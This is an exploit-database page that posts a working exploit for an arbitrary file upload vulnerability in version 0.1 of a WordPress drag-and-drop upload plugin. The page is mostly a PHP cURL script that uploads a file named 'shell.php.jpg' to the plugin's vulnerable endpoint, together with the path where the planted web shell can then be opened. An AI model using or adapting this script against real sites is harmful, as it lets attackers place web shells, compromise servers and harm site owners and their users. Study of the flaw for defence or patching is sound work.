WordPress drag and drop file upload 0.1 Arbitrary File Upload Vulnerability

日期: 2012/06/12 | 标签:wordpress | 游览：266

###########################################################

Vuln page : http://mysite.com/wp-content/plugins/drag-drop-file-uploader/dnd-upload.php

exploit :

<?php
$u=”shell.php.jpg”;
$c = curl_init(“http://127.0.0.1/wp/wp-content/plugins/drag-drop-file-uploader/dnd-upload.php”);
curl_setopt($c, CURLOPT_POST, true);
curl_setopt($c, CURLOPT_POSTFIELDS,
array(‘file’=>”@$u”));
curl_setopt($c, CURLOPT_RETURNTRANSFER, 1);
$e = curl_exec($c);
curl_close($c);
echo $e;
?>

Shell access : http://mysite.com/wp-content/uploads/[YYYY]/[MM]/shell.php.jpg

#####################################################################

← WordPress Custom Content Type Manager 0.9.5.13-pl Arbitrary File Upload Vulnerability

WordPress Mac Photo Gallery 2.7 Arbitrary File Upload →

ZeroBox Vulnerability Database

坚持！我们将做的更好！

WordPress drag and drop file upload 0.1 Arbitrary File Upload Vulnerability

评论关闭。